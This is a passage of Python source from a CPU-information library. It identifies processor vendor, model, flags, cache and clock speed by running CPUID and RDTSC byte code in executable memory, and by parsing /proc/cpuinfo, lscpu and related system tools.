elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
return (arch, bits)
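# Hedged examples (not called anywhere): parse_arch() normalises the raw
# platform.machine() string into an (arch, bits) pair.
def _parse_arch_example():
    assert parse_arch('x86_64') == ('X86_64', 64)
    assert parse_arch('armv7l') == ('ARM_7', 32)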
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each byte of each register is an ASCII letter of the vendor name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gb' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Put an empty result on the queue and return if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Put an empty result on the queue and return if SELinux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the Hz and scale
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if this platform cannot run the CPUID instruction
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))  # args must be a tuple
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
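# Sketch of the isolation pattern used by _get_cpu_info_from_cpuid() above (standard library
# only, purely illustrative and not called elsewhere): a crash-prone callable that writes its
# result to a Queue is run in a child process, so a hard crash only kills the child and the
# parent simply gets an empty result back.
def _example_run_isolated(target):
    from multiprocessing import Process, Queue
    queue = Queue()
    p = Process(target=target, args=(queue,))
    p.start()
    p.join()
    if p.exitcode == 0 and not queue.empty():
        return queue.get()
    return {}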
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# If either the advertised or the actual Hz is missing, use the other value for both
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
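# Minimal parsing sketch (hypothetical helper, not used by the code above): shows how a single
# "cpu MHz" line from /proc/cpuinfo can be reduced to a number, which is the kind of
# normalisation that _get_field() and to_hz_string() perform on the full output.
def _example_parse_cpu_mhz(line):
    # e.g. 'cpu MHz\t\t: 1800.000' -> 1800.0
    return float(line.split(':', 1)[1].strip())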
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
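# Sketch of the scale convention used above (hypothetical helper, not called anywhere): a
# frequency string is kept as a decimal value plus a power-of-ten scale, where 6 means MHz and
# 9 means GHz, and only expanded to plain Hz at the end.
def _example_scaled_to_hz(value, scale):
    # e.g. ('2.4', 9) -> 2400000000
    return int(float(value) * (10 ** scale))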
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
